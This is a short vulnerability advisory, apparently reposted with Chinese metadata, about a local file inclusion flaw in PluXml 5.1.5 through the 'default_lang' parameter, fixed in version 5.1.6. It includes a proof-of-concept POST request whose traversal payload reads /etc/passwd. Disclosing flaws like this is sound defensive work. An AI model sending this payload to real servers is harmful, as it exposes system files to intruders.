开发者网站: pluxml.org
缺陷影响版本: 5.1.5 及以前
已测试版本: 5.1.5
补丁时间: 16 April 2012
问题类别:本地文件包含
修复状态：作者已修正
高危

日志
 
High-Tech Bridge SA Security Research Lab has discovered vulnerabiliy in PluXml, which can be exploited to perform Local File Inclusion attacks.
 
 
1) Local File Inclusion in PluXml
 
1.1 Input passed via the "default_lang" POST parameter to /update/index.php is not properly verified before being used in www.2cto.com include_once() function and can be exploited to include arbitrary local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
 
The following PoC (Proof of Concept) demonstrates the vulnerability:
 
 
POST /update/index.php HTTP/1.1
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: [...]
 
default_lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
 
 
-----------------------------------------------------------------------------------------------
 
解决方案:
 
升级到 PluXml 5.1.6
 
More Information:
http://www.pluxml.org/article59/sortie-de-pluxml-5-1-6
http://telechargements.pluxml.org/changelog
 
-----------------------------------------------------------------------------------------------